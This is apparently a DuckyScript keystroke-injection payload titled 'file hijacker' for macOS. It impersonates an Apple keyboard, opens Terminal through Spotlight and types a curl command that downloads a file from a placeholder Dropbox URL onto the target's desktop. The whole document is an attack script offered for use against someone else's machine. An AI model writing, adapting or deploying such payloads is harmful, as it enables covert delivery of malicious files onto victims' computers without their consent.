22 lines
498 B
Plaintext
22 lines
498 B
Plaintext
REM Author: Narsty
|
|
REM Title: file hijacker
|
|
REM Version 1.0 MacOs
|
|
|
|
REM Replace <dropbox URL> with the actual URL for the file you want to download.
|
|
REM Additionally, replace filename with the desired name and extension for the downloaded file.
|
|
REM the script will download a file to the target MacOs desktop
|
|
|
|
ID 05ac:021e Apple:Keyboard
|
|
DELAY 500
|
|
GUI SPACE
|
|
DELAY 500
|
|
STRING terminal
|
|
DELAY 1000
|
|
ENTER
|
|
DELAY 500
|
|
STRING curl -L -o ~/Desktop/<filename> "<Dropbox URL>"
|
|
DELAY 500
|
|
ENTER
|
|
DELAY 5000
|
|
ENTER
|